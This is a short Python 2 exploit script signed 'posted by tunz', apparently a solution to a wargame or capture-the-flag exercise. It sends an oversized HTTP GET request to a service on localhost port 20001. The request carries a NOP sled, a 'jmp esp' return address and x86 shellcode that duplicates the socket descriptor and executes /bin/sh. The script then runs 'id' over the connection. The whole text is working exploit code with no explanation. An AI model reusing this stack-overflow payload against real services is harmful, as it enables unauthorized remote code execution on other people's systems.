from struct import *
from socket import *
import time
 
fd=4
shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2
shellcode = shellcode.replace("\x41", chr(fd))
# bin/sh
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(('localhost',20001))
#raw_input("go? ")
buf = ""
buf += "GET "
buf += "\x90"*139
buf += pack('<I',0x8049f4f) # jmp esp
buf += "\x90" *100
buf += shellcode
buf += " HTTP/1.1"
s.send(buf)
 
s.send("id\n")
get = s.recv(1024)
print get
s.close()


posted by tunz